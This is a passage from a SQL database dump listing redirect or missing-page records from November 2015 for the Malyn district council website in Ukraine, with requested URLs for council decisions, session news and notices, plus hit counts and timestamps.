00:00:00',301),(19116,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/963-pro-stan-zakonnosti-ta-pravoporyadku-na-teritoriji-malinskogo-rajonu-za-11-misyatsiv-2014-roku?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-19 14:57:14','0000-00-00 00:00:00',301),(19117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=348:2011-06-15-12-35-38&catid=34:--15062011-&Itemid=68&lang=uk','','http://yandex.ua/clck/jsredir?from=yandex.ua%3Bsearch%2F%3Bweb%3B%3B&text=%D0%BB%D1%96%D0%BA%D0%B0%D1%80-%D1%85%D1%96%D1%80%D1%83%D1%80%D0%B3%20%D0%B4','',28,0,'2015-11-19 20:09:13','0000-00-00 00:00:00',301),(19118,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1048:2013-07-10-05-53-06&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-19 20:32:57','0000-00-00 00:00:00',301),(19119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=699:-2011-2015-&catid=43:--25072012-&Itemid=82&lang=uk','','','',2,0,'2015-11-19 20:49:40','0000-00-00 00:00:00',301),(19120,'http://www.malyn-rayrada.org.ua/attachments/477_додаток 1_Дефектний акт.pdf','','','',26,0,'2015-11-19 21:08:07','0000-00-00 00:00:00',301),(19121,'http://malyn-rayrada.org.ua/index.php/1099-vidbulas-39-sesiya-rajonnoji-radi','','','',4,0,'2015-11-19 22:05:43','0000-00-00 00:00:00',301),(19122,'http://malyn-rayrada.org.ua/index.php/1108-pro-sklikannya-40-pozachergovoji-sesiji-rajonnoji-radi-6-sklikannya','','','',3,0,'2015-11-19 22:05:45','0000-00-00 00:00:00',301),(19123,'http://malyn-rayrada.org.ua/index.php/1108-pro-sklikannya-40-pozachergovoji-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-19 22:05:46','0000-00-00 00:00:00',301),(19124,'http://malyn-rayrada.org.ua/index.php/1112-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-5-misyatsiv-2015-roku','','','',3,0,'2015-11-19 22:05:49','0000-00-00 00:00:00',301),(19125,'http://malyn-rayrada.org.ua/index.php/1112-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-5-misyatsiv-2015-roku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-19 22:05:50','0000-00-00 00:00:00',301),(19126,'http://malyn-rayrada.org.ua/index.php/1113-pomer-kulchitskij-josip-lyudvigovich-pochesnij-gromadyanin-malina','','','',3,0,'2015-11-19 22:05:53','0000-00-00 00:00:00',301),(19127,'http://malyn-rayrada.org.ua/index.php/1113-pomer-kulchitskij-josip-lyudvigovich-pochesnij-gromadyanin-malina?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-19 22:05:55','0000-00-00 00:00:00',301),(19128,'http://malyn-rayrada.org.ua/index.php/1115-vidbulas-40-pozachergova-sesiya-rajonnoji-radi','','','',4,0,'2015-11-19 22:05:57','0000-00-00 00:00:00',301),(19129,'http://malyn-rayrada.org.ua/index.php/1115-vidbulas-40-pozachergova-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-19 22:06:00','0000-00-00 00:00:00',301),(19130,'http://malyn-rayrada.org.ua/index.php/1132-zastupnik-keruyuchogo-nachalnik-viddilu-rozvitku-bankivskogo-biznesu-tvbv-10005-038-filiji-zhitomirskogo-oblasnogo-upravlinnya-at-oshchadbank-mikhajlenko-s-m-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-19 22:06:06','0000-00-00 00:00:00',301),(19131,'http://malyn-rayrada.org.ua/index.php/1172-vidbulas-41-sesiya-rajonnoji-radi','','','',3,0,'2015-11-19 22:06:09','0000-00-00 00:00:00',301),(19132,'http://www.malyn-rayrada.org.ua/index.php/1067-kp-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-19 22:12:21','0000-00-00 00:00:00',301),(19133,'http://www.malyn-rayrada.org.ua/index.php/1071-narada-za-uchastyu-nachalnika-oblasnogo-kaznachejstva-petra-chornogo?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-19 22:12:23','0000-00-00 00:00:00',301),(19134,'http://www.malyn-rayrada.org.ua/index.php/1074-do-vidoma-silskikh-ta-selishchnikh-rad-roz-yaznennya-tsvk?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-19 22:12:27','0000-00-00 00:00:00',301),(19135,'http://www.malyn-rayrada.org.ua/index.php/1172-vidbulas-41-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-19 22:12:41','0000-00-00 00:00:00',301),(19136,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1058-oprilyudnennya-vydomostej-pro-dokhodi-za-2014-rik-kerivnitstva-ivanivskoji-silskoji-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-19 22:12:54','0000-00-00 00:00:00',301),(19137,'http://www.malyn-rayrada.org.ua/index.php/40-vitaemo-zi-svjatom-hristovogo-voskresinnja?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-19 22:13:07','0000-00-00 00:00:00',301),(19138,'http://www.malyn-rayrada.org.ua/index.php/539-malinska-rajonna-rada-shhiro-vitae-vas-iz-dnem?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-19 22:13:15','0000-00-00 00:00:00',301),(19139,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/406-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_16?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-19 22:13:24','0000-00-00 00:00:00',301),(19140,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/364-pro-pogodzhennja-perejmenuvannja-naselenih-punktiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 22:13:32','0000-00-00 00:00:00',301),(19141,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/368-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_7?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 22:14:00','0000-00-00 00:00:00',301),(19142,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/383-pro-zamishhennja-deputata-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 22:14:04','0000-00-00 00:00:00',301),(19143,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/395-pro-zvernennja-do-nachalnika-sluzhbi-avtomobilnih?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 22:14:06','0000-00-00 00:00:00',301),(19144,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/108-pro-hid-vikonannja-rajonnoi-programi-ohoroni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 22:14:11','0000-00-00 00:00:00',301),(19145,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/150-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-19 22:14:13','0000-00-00 00:00:00',301),(19146,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/94-pro-hid-vikonannja-programi-pidtrimki-malogo','','','',18,0,'2015-11-19 22:14:17','0000-00-00 00:00:00',301),(19147,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/137-pro-utvorennja-cilovogo-fondu-socialno','','','',23,0,'2015-11-19 22:14:23','0000-00-00 00:00:00',301),(19148,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/138-pro-rezervuvannja-zemel?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-19 22:14:25','0000-00-00 00:00:00',301),(19149,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=70&lang=uk','','','',2,0,'2015-11-20 01:07:00','0000-00-00 00:00:00',301),(19150,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=643:-6-&catid=42:--16052012-&Itemid=80&lang=ru','','','',2,0,'2015-11-20 02:31:37','0000-00-00 00:00:00',301),(19151,'http://www.malyn-rayrada.org.ua/index.php?id=46&Itemid=85&lang=uk&layout=blog&option=com_content&view=category','','','',4,0,'2015-11-20 02:39:52','0000-00-00 00:00:00',301),(19152,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=uk','','','',4,0,'2015-11-20 03:18:39','0000-00-00 00:00:00',301),(19153,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=uk&limitstart=5','','','',6,0,'2015-11-20 03:39:14','0000-00-00 00:00:00',301),(19154,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=436:------l-r--2007-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-20 04:09:40','0000-00-00 00:00:00',301),(19155,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1060:2013-07-27-10-13-15&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-20 06:13:01','0000-00-00 00:00:00',301),(19156,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=52&layout=blog&Itemid=93&lang=ru','','','',10,0,'2015-11-20 07:33:11','0000-00-00 00:00:00',301),(19157,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=7:2010-06-05-14-44-23&catid=2&Itemid=5&lang=ru','','','',18,0,'2015-11-20 08:17:33','0000-00-00 00:00:00',301),(19158,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=68:2010-07-22-11-16-14&catid=11&Itemid=16&lang=uk','','','',3,0,'2015-11-20 10:34:24','0000-00-00 00:00:00',301),(19159,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45:--14112012-&Itemid=84&lang=uk','','','',1,0,'2015-11-20 11:24:38','0000-00-00 00:00:00',301),(19160,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=818:2012-11-14-16-37-52&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-11-20 11:24:38','0000-00-00 00:00:00',301),(19161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-11-20 11:24:54','0000-00-00 00:00:00',301),(19162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=205:--------2011--&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-11-20 11:24:58','0000-00-00 00:00:00',301),(19163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru&limitstart=30','','','',1,0,'2015-11-20 11:25:29','0000-00-00 00:00:00',301),(19164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=621:-2012-&catid=40:--28032012-&Itemid=77&lang=uk','','','',3,0,'2015-11-20 11:25:37','0000-00-00 00:00:00',301),(19165,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/12-pro-hid-vikonannja-rajonnoi-programi-rozvitku','','','',15,0,'2015-11-20 11:26:03','0000-00-00 00:00:00',301),(19167,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=320:-2010-2014-&catid=33&Itemid=66&lang=en','','','',2,0,'2015-11-20 11:26:45','0000-00-00 00:00:00',301),(19168,'http://www.malyn-rayrada.org.ua/index.php/37-shho-minfin-vdilit-rajonu-v-2012-roci','','','',18,0,'2015-11-20 11:27:16','0000-00-00 00:00:00',301),(19169,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',3,0,'2015-11-20 11:27:21','0000-00-00 00:00:00',301),(19170,'http://www.malyn-rayrada.org.ua/index.php/1185-problemu-potribno-virishuvati-spilno?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-20 11:28:34','0000-00-00 00:00:00',301),(19171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=uk&limitstart=15','','','',5,0,'2015-11-20 11:29:05','0000-00-00 00:00:00',301),(19172,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2015-11-20 11:29:14','0000-00-00 00:00:00',301),(19173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=421:2011-09-30-14-14-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2015-11-20 11:30:04','0000-00-00 00:00:00',301),(19174,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=21','','','',41,0,'2015-11-20 11:30:39','0000-00-00 00:00:00',301),(19175,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/808-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_14','','','',18,0,'2015-11-20 11:30:39','0000-00-00 00:00:00',301),(19176,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-20 11:48:39','0000-00-00 00:00:00',301),(19177,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=315:2011-05-20-13-07-47&Itemid=66&lang=en&option=com_content&view=article','','','',1,0,'2015-11-20 14:14:34','0000-00-00 00:00:00',301),(19178,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=41&Itemid=78&lang=ru','','','',5,0,'2015-11-20 15:02:57','0000-00-00 00:00:00',301),(19179,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=819:2012-11-14-16-40-09&Itemid=84&lang=en&option=com_content&view=article','','','',3,0,'2015-11-20 15:24:53','0000-00-00 00:00:00',301),(19180,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/307-pro-pogodzhennja-otrimannja-specialnogo-dozvolu-na','','','',6,0,'2015-11-20 16:39:01','0000-00-00 00:00:00',301),(19181,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=7','','','',7,0,'2015-11-20 20:44:53','0000-00-00 00:00:00',301),(19182,'http://www.malyn-rayrada.org.ua/index.php/217-zakon-pro-misceve-samovrjaduvannja-potribno','','','',13,0,'2015-11-20 20:53:51','0000-00-00 00:00:00',301),(19183,'http://malyn-rayrada.org.ua/index.php/1014-20-lyutogo-2015-roku-blagodijnij-kontsert-povertajsya-zhivim?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-20 21:59:35','0000-00-00 00:00:00',301),(19184,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=817:---------------l--r&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-20 22:38:44','0000-00-00 00:00:00',301),(19185,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku','','','',16,0,'2015-11-20 23:28:42','0000-00-00 00:00:00',301),(19186,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=204:2010-12-15-14-13-07&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-21 01:15:54','0000-00-00 00:00:00',301),(19187,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/80-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_2','','','',12,0,'2015-11-21 06:25:35','0000-00-00 00:00:00',301),(19188,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/97-pro-zatverdzhennja-polozhennja-pro-porjadok','','','',2,0,'2015-11-21 06:25:36','0000-00-00 00:00:00',301),(19189,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/532-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp','','','',21,0,'2015-11-21 06:25:43','0000-00-00 00:00:00',301),(19190,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/536-pro-hid-vikonannja-rajonnoi-programi-zaluchennja_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-21 06:25:49','0000-00-00 00:00:00',301),(19191,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/538-pro-vikonannja-planu-roboti-rajonnoi-radi-za-i_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-21 06:25:52','0000-00-00 00:00:00',301),(19192,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/201-pro-vnesennja-zmin-ta-dopovnen-do-rishennja?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-21 06:26:28','0000-00-00 00:00:00',301),(19193,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/11-pro-hid-vikonannja-rajonnoi-programi-realizacii','','','',11,0,'2015-11-21 06:29:30','0000-00-00 00:00:00',301),(19195,'http://www.malyn-rayrada.org.ua/index.php?id=55&Itemid=96&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-21 06:41:11','0000-00-00 00:00:00',301),(19197,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=14','','','',13,0,'2015-11-21 07:47:00','0000-00-00 00:00:00',301),(19199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=uk&limitstart=5','','','',2,0,'2015-11-21 10:37:31','0000-00-00 00:00:00',301),(19200,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2015-11-21 10:56:08','0000-00-00 00:00:00',301),(19202,'http://www.malyn-rayrada.org.ua/index.php/897-vitaemo-oleksiya-grigorovicha-iz-vpevnenoyu-peremogoyu','','https://www.google.com.ua/','',68,0,'2015-11-21 13:21:49','0000-00-00 00:00:00',301),(19203,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=742:-14-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-21 13:35:34','0000-00-00 00:00:00',301),(19204,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=634:-2016-&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-21 13:46:18','0000-00-00 00:00:00',301),(19206,'http://www.malyn-rayrada.org.ua/index.php/648-ogoloshennja-povtornij-konkurs','','','',14,0,'2015-11-21 19:14:42','0000-00-00 00:00:00',301),(19207,'http://www.malyn-rayrada.org.ua/index.php/973-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-antiteroristichnoji-operatsiji','','','',7,0,'2015-11-21 19:15:10','0000-00-00 00:00:00',301),(19208,'http://www.malyn-rayrada.org.ua/index.php/987-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-ato','','','',51,0,'2015-11-21 19:15:47','0000-00-00 00:00:00',301),(19209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=479:2011-11-28-07-33-14&catid=38:--19122011-&Itemid=73&lang=ru','','','',6,0,'2015-11-21 19:19:11','0000-00-00 00:00:00',301),(19210,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/981-pro-zatverdzhennya-programi-rozvitku-malogo-i-serednogo-pidpriemnitstva-malinskogo-rajonu-na-2015-2016-roki','','','',12,0,'2015-11-21 19:25:02','0000-00-00 00:00:00',301),(19211,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/940-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',14,0,'2015-11-21 19:26:15','0000-00-00 00:00:00',301),(19212,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1023-pro-zatverdzhennya-zvitu-pro-otsinka-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',18,0,'2015-11-21 19:26:50','0000-00-00 00:00:00',301),(19213,'http://malyn-rayrada.org.ua/index.php/1000-go-malinshchina-pidtrimaemo-zemlyakiv-dopomozhimo-jim-razom','','','',8,0,'2015-11-21 19:32:32','0000-00-00 00:00:00',301),(19214,'http://malyn-rayrada.org.ua/index.php/1071-narada-za-uchastyu-nachalnika-oblasnogo-kaznachejstva-petra-chornogo','','','',6,0,'2015-11-21 19:32:35','0000-00-00 00:00:00',301),(19215,'http://malyn-rayrada.org.ua/index.php/1209-pishov-z-zhittya-volodimir-melnichenko','','','',6,0,'2015-11-21 19:32:40','0000-00-00 00:00:00',301),(19216,'http://malyn-rayrada.org.ua/index.php/218-informacija-pro-dijalnist-likarnjanoi-kasi-u','','','',4,0,'2015-11-21 19:32:59','0000-00-00 00:00:00',301),(19217,'http://malyn-rayrada.org.ua/index.php/281-vidbulas-11-sesija-rajonnoi-radi-6-sklikannja','','','',8,0,'2015-11-21 19:33:00','0000-00-00 00:00:00',301),(19218,'http://malyn-rayrada.org.ua/index.php/366-do-vidoma-zhiteliv-mista-ta-rajonu','','','',3,0,'2015-11-21 19:33:02','0000-00-00 00:00:00',301),(19219,'http://malyn-rayrada.org.ua/index.php/386-pershi-oficijni-rezultati-viboriv','','','',5,0,'2015-11-21 19:33:03','0000-00-00 00:00:00',301),(19220,'http://malyn-rayrada.org.ua/index.php/475-vidbulas-pozachergova-19-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-21 19:33:10','0000-00-00 00:00:00',301),(19221,'http://malyn-rayrada.org.ua/index.php/525-rejtingova-ocinka-dijalnosti-rajoniv-ta-mist','','','',3,0,'2015-11-21 19:33:16','0000-00-00 00:00:00',301),(19222,'http://malyn-rayrada.org.ua/index.php/619-do-vidoma-pidpriemciv-ta-zhiteliv-kabmin-vstanoviv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-21 19:33:18','0000-00-00 00:00:00',301),(19223,'http://malyn-rayrada.org.ua/index.php/620-z-svjatom-osvitjani','','','',4,0,'2015-11-21 19:33:19','0000-00-00 00:00:00',301),(19224,'http://malyn-rayrada.org.ua/index.php/621-miscevi-avtodorogi-peredadut','','','',3,0,'2015-11-21 19:33:21','0000-00-00 00:00:00',301),(19225,'http://malyn-rayrada.org.ua/index.php/621-miscevi-avtodorogi-peredadut?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:33:23','0000-00-00 00:00:00',301),(19226,'http://malyn-rayrada.org.ua/index.php/622-malinske-viddilennja-dai-udai-umvs-ukraini-v','','','',4,0,'2015-11-21 19:33:24','0000-00-00 00:00:00',301),(19227,'http://malyn-rayrada.org.ua/index.php/622-malinske-viddilennja-dai-udai-umvs-ukraini-v?tmpl=component&print=1&layout=default&page=','','','',14,0,'2015-11-21 19:33:26','0000-00-00 00:00:00',301),(19228,'http://malyn-rayrada.org.ua/index.php/625-cvjato-pokrovi-presvjatoi-bogorodici-u-vorsivci?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:33:28','0000-00-00 00:00:00',301),(19229,'http://malyn-rayrada.org.ua/index.php/632-zavershilas-pidgotovka-do-provedennja-24-sesii?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-21 19:33:34','0000-00-00 00:00:00',301),(19230,'http://malyn-rayrada.org.ua/index.php/633-informacija-shhodo-vnesennja-zmin-v-bjudzhet-2013?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:33:37','0000-00-00 00:00:00',301),(19231,'http://malyn-rayrada.org.ua/index.php/637-vidbulos-zasidannja-24-sesii-6-sklikannja','','','',3,0,'2015-11-21 19:33:39','0000-00-00 00:00:00',301),(19232,'http://malyn-rayrada.org.ua/index.php/638-perevedit-strilki-godinnikiv-na-1-godinu-nazad','','','',3,0,'2015-11-21 19:33:42','0000-00-00 00:00:00',301),(19233,'http://malyn-rayrada.org.ua/index.php/640-upravlinnja-statistiki-informue_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:33:43','0000-00-00 00:00:00',301),(19234,'http://malyn-rayrada.org.ua/index.php/641-pitannja-rozrahunkiv-rozporjadnikiv-koshtiv','','','',5,0,'2015-11-21 19:33:44','0000-00-00 00:00:00',301),(19235,'http://malyn-rayrada.org.ua/index.php/642-vijshli-na-finishnu-prjamu','','','',5,0,'2015-11-21 19:33:49','0000-00-00 00:00:00',301),(19236,'http://malyn-rayrada.org.ua/index.php/642-vijshli-na-finishnu-prjamu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:33:50','0000-00-00 00:00:00',301),(19237,'http://malyn-rayrada.org.ua/index.php/643-ogoloshennja_9','','','',5,0,'2015-11-21 19:33:52','0000-00-00 00:00:00',301),(19238,'http://malyn-rayrada.org.ua/index.php/643-ogoloshennja_9?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:33:54','0000-00-00 00:00:00',301),(19239,'http://malyn-rayrada.org.ua/index.php/644-dodatkovu-dotaciju-z-derzhavnogo-bjudzhetu','','','',5,0,'2015-11-21 19:33:55','0000-00-00 00:00:00',301),(19240,'http://malyn-rayrada.org.ua/index.php/644-dodatkovu-dotaciju-z-derzhavnogo-bjudzhetu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:33:57','0000-00-00 00:00:00',301),(19241,'http://malyn-rayrada.org.ua/index.php/645-pro-nadannja-praktichnoi-dopomogi-u-vidnovlenni','','','',4,0,'2015-11-21 19:33:58','0000-00-00 00:00:00',301),(19242,'http://malyn-rayrada.org.ua/index.php/645-pro-nadannja-praktichnoi-dopomogi-u-vidnovlenni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:34:00','0000-00-00 00:00:00',301),(19243,'http://malyn-rayrada.org.ua/index.php/646-shhe-odin-krok-do-zavershennja-vporjadkuvannja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:34:01','0000-00-00 00:00:00',301),(19244,'http://malyn-rayrada.org.ua/index.php/649-pro-ogoloshennja-podjaki','','','',4,0,'2015-11-21 19:34:03','0000-00-00 00:00:00',301),(19245,'http://malyn-rayrada.org.ua/index.php/649-pro-ogoloshennja-podjaki?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-21 19:34:04','0000-00-00 00:00:00',301),(19246,'http://malyn-rayrada.org.ua/index.php/987-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-ato','','','',8,0,'2015-11-21 19:34:12','0000-00-00 00:00:00',301),(19247,'http://malyn-rayrada.org.ua/index.php/987-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-ato?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-21 19:34:13','0000-00-00 00:00:00',301),(19248,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/406-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_16','','','',4,0,'2015-11-21 19:34:24','0000-00-00 00:00:00',301),(19249,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/399-pro-zatverdzhennja-zmin-do-strukturi-ta','','','',4,0,'2015-11-21 19:34:42','0000-00-00 00:00:00',301),(19250,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/734-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_18','','','',4,0,'2015-11-21 19:34:48','0000-00-00 00:00:00',301),(19251,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/191-pro-vnesennja-zmin-do-tipovogo-dogovoru-orendi','','','',4,0,'2015-11-21 19:34:52','0000-00-00 00:00:00',301),(19252,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/192-pro-vnesennja-zmin-ta-dopovnen-do-polozhennja-pro','','','',4,0,'2015-11-21 19:34:53','0000-00-00 00:00:00',301),(19253,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/193-pro-upovnovazhennja-rajonnoi-derzhavnoi','','','',4,0,'2015-11-21 19:34:55','0000-00-00 00:00:00',301),(19254,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/194-pro-nadannja-pilgi-z-orendnoi-plati-viddilu','','','',4,0,'2015-11-21 19:34:58','0000-00-00 00:00:00',301),(19255,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-?start=7','','','',6,0,'2015-11-21 19:35:13','0000-00-00 